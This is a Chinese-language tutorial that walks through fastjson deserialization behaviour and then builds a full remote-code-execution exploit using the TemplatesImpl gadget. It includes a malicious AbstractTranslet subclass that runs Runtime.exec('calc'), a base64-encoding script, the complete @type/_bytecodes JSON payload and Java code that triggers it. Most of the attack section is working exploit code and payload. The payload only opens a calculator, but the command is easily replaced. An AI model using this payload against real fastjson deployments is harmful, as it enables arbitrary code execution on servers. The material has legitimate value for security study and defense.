1. fastjson 简单使用

类

package gfftufukv;

public class User {
    String name;
    private String grage = "";

    public User() {
        System.out.println("constrctor1");
    }

    public User(String name) {
        System.out.println("constrctor2");
        this.name = name;
    }

    public String getName() {
        System.out.println("getName");
        return name;
    }

    public void setName(String name) {
        System.out.println("setName");
        this.name = name;
    }


    public String getGrade(){
        System.out.println("getGrade");
        return grage;
    }

    @Override
    public String toString() {
        return "User{" +
                "name='" + name + '\'' +
                ", grage='" + grage + '\'' +
                '}';
    }
}

！！！grage 没有setter

案例case

package gfftufukv;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;

/**
 * Hello world!
 *
 */
public class App 
{
    public static void main( String[] args )
    {

        //Simple Case
        User user = new User("asdf");
        String json = JSON.toJSONString(user);
        System.out.println(json);
        System.out.println("++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
        //Exception in thread "main" java.lang.ClassCastException: com.alibaba.fastjson.JSONObject cannot be cast to gfftufukv.User
        //	at gfftufukv.App.main(App.java:18)
//        User user1 = (User) JSON.parse(json);
//        System.out.println(user1.getName());
        String type = "{\"@type\":\"gfftufukv.User\",\"name\":\"asdf\",\"grage\":\"1212\"}";
        User user1 = (User) JSON.parse(type);
        //实际上调用了getter setter
        System.out.println(user1);
        System.out.println("++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
        //Feature.SupportNonPublicField
        User user2 = JSON.parseObject(type,User.class, Feature.SupportNonPublicField);
        System.out.println(user2);
        System.out.println("++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
        //Feature.SupportNonPublicField
        //调用toString 支持toString的方法就行
        String user3 = JSON.parseObject(type,String.class, Feature.SupportNonPublicField);
        System.out.println(user3);
        System.out.println("++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
        //Feature.SupportNonPublicField
        //调用toString 支持toString的方法就行
        User user4 = (User) JSON.parse(type,Feature.SupportNonPublicField);
        System.out.println(user4);

    }
}

结果

constrctor2
getGrade
getName
{"grade":"","name":"asdf"}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage=''}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}

总结

调用点

constrctor
set......
get......

私有变量修改

Feature.SupportNonPublicField

类型

User user2 = JSON.parseObject(type,User.class, Feature.SupportNonPublicField);
//需要的类就可以如user
String user3 = JSON.parseObject(type,String.class, Feature.SupportNonPublicField);
//调用toString 支持toString的方法就行

2.利用

需要寻找getXxxx,并且可以序列化的类
于是发现了TemplatesImpl

是否可利用

    public synchronized Properties getOutputProperties() {
        try {
            return newTransformer().getOutputProperties();
        }
        catch (TransformerConfigurationException e) {
            return null;
        }
    }

newTransformer()

public synchronized Transformer newTransformer()
        throws TransformerConfigurationException
    {
        TransformerImpl transformer;

        transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
            _indentNumber, _tfactory);

        if (_uriResolver != null) {
            transformer.setURIResolver(_uriResolver);
        }

        if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
            transformer.setSecureProcessing(true);
        }
        return transformer;
    }

getTransletInstance

private Translet getTransletInstance()
        throws TransformerConfigurationException {
        try {
            if (_name == null) return null;

            if (_class == null) defineTransletClasses();

            // The translet needs to keep a reference to all its auxiliary
            // class to prevent the GC from collecting them
            AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
            translet.postInitialization();
            translet.setTemplates(this);
            translet.setServicesMechnism(_useServicesMechanism);
            translet.setAllowedProtocols(_accessExternalStylesheet);
            if (_auxClasses != null) {
                translet.setAuxiliaryClasses(_auxClasses);
            }

            return translet;
        }
        catch (InstantiationException e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
        catch (IllegalAccessException e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }

实例化

AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();

调用defineTransletClasses 获取_class
_class[i] = loader.defineClass(_bytecodes[i]);

    private void defineTransletClasses()
        throws TransformerConfigurationException {

        if (_bytecodes == null) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
            throw new TransformerConfigurationException(err.toString());
        }

        TransletClassLoader loader = (TransletClassLoader)
            AccessController.doPrivileged(new PrivilegedAction() {
                public Object run() {
                    return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
                }
            });

        try {
            final int classCount = _bytecodes.length;
            _class = new Class[classCount];

            if (classCount > 1) {
                _auxClasses = new HashMap<>();
            }

            for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();

                // Check if this is the main class
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }

            if (_transletIndex < 0) {
                ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
                throw new TransformerConfigurationException(err.toString());
            }
        }
        catch (ClassFormatError e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
        catch (LinkageError e) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }

原料
AbstractTranslet

构造payload
测试类

package gfftufukv;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

//类选择看 AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
public class ExpTranslet extends AbstractTranslet {

    public ExpTranslet(){
        System.out.println("===============EXP++================");
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        new ExpTranslet();
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

转成base64

import base64

def file2base64(File):
    with open(File,"rb") as file:
        return base64.b64encode(file.read()).decode()

print(file2base64("./ExpTranslet.class"))

因为java base64 用了报错
换回payload里面

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADMARwoADAAsCQAtAC4IAC8KADAAMQoAMgAzCAA0CgAyADUHADYKAAgANwcAOAoACgAsBwA5AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAXTGdmZnR1ZnVrdi9FeHBUcmFuc2xldDsBAA1TdGFja01hcFRhYmxlBwA4BwA2AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA6AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAQRXhwVHJhbnNsZXQuamF2YQwADQAOBwA7DAA8AD0BACQ9PT09PT09PT09PT09PT1FWFArKz09PT09PT09PT09PT09PT0HAD4MAD8AQAcAQQwAQgBDAQAEY2FsYwwARABFAQATamF2YS9pby9JT0V4Y2VwdGlvbgwARgAOAQAVZ2ZmdHVmdWt2L0V4cFRyYW5zbGV0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAwAAAAAAAQAAQANAA4AAQAPAAAAiAACAAIAAAAeKrcAAbIAAhIDtgAEuAAFEga2AAdXpwAITCu2AAmxAAEADAAVABgACAADABAAAAAeAAcAAAAOAAQADwAMABEAFQAUABgAEgAZABMAHQAVABEAAAAWAAIAGQAEABIAEwABAAAAHgAUABUAAAAWAAAAEAAC/wAYAAEHABcAAQcAGAQACQAZABoAAQAPAAAANwACAAEAAAAJuwAKWbcAC1exAAAAAgAQAAAACgACAAAAGAAIABkAEQAAAAwAAQAAAAkAGwAcAAAAAQAdAB4AAgAPAAAAPwAAAAMAAAABsQAAAAIAEAAAAAYAAQAAAB4AEQAAACAAAwAAAAEAFAAVAAAAAAABAB8AIAABAAAAAQAhACIAAgAjAAAABAABACQAAQAdACUAAgAPAAAASQAAAAQAAAABsQAAAAIAEAAAAAYAAQAAACMAEQAAACoABAAAAAEAFAAVAAAAAAABAB8AIAABAAAAAQAmACcAAgAAAAEAKAApAAMAIwAAAAQAAQAkAAEAKgAAAAIAKw=="],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}

只是计算器

触发payload

String text1 = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADMARwoADAAsCQAtAC4IAC8KADAAMQoAMgAzCAA0CgAyADUHADYKAAgANwcAOAoACgAsBwA5AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAXTGdmZnR1ZnVrdi9FeHBUcmFuc2xldDsBAA1TdGFja01hcFRhYmxlBwA4BwA2AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA6AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAQRXhwVHJhbnNsZXQuamF2YQwADQAOBwA7DAA8AD0BACQ9PT09PT09PT09PT09PT1FWFArKz09PT09PT09PT09PT09PT0HAD4MAD8AQAcAQQwAQgBDAQAEY2FsYwwARABFAQATamF2YS9pby9JT0V4Y2VwdGlvbgwARgAOAQAVZ2ZmdHVmdWt2L0V4cFRyYW5zbGV0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAwAAAAAAAQAAQANAA4AAQAPAAAAiAACAAIAAAAeKrcAAbIAAhIDtgAEuAAFEga2AAdXpwAITCu2AAmxAAEADAAVABgACAADABAAAAAeAAcAAAAOAAQADwAMABEAFQAUABgAEgAZABMAHQAVABEAAAAWAAIAGQAEABIAEwABAAAAHgAUABUAAAAWAAAAEAAC/wAYAAEHABcAAQcAGAQACQAZABoAAQAPAAAANwACAAEAAAAJuwAKWbcAC1exAAAAAgAQAAAACgACAAAAGAAIABkAEQAAAAwAAQAAAAkAGwAcAAAAAQAdAB4AAgAPAAAAPwAAAAMAAAABsQAAAAIAEAAAAAYAAQAAAB4AEQAAACAAAwAAAAEAFAAVAAAAAAABAB8AIAABAAAAAQAhACIAAgAjAAAABAABACQAAQAdACUAAgAPAAAASQAAAAQAAAABsQAAAAIAEAAAAAYAAQAAACMAEQAAACoABAAAAAEAFAAVAAAAAAABAB8AIAABAAAAAQAmACcAAgAAAAEAKAApAAMAIwAAAAQAAQAkAAEAKgAAAAIAKw==\n\"],\"_name\":\"a.b\",\"_tfactory\":{ },\"_outputProperties\":{ },\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}";

        System.out.println(text1);
        Object obj = JSON.parseObject(text1, Object.class, Feature.SupportNonPublicField);

原理详解 稍后更新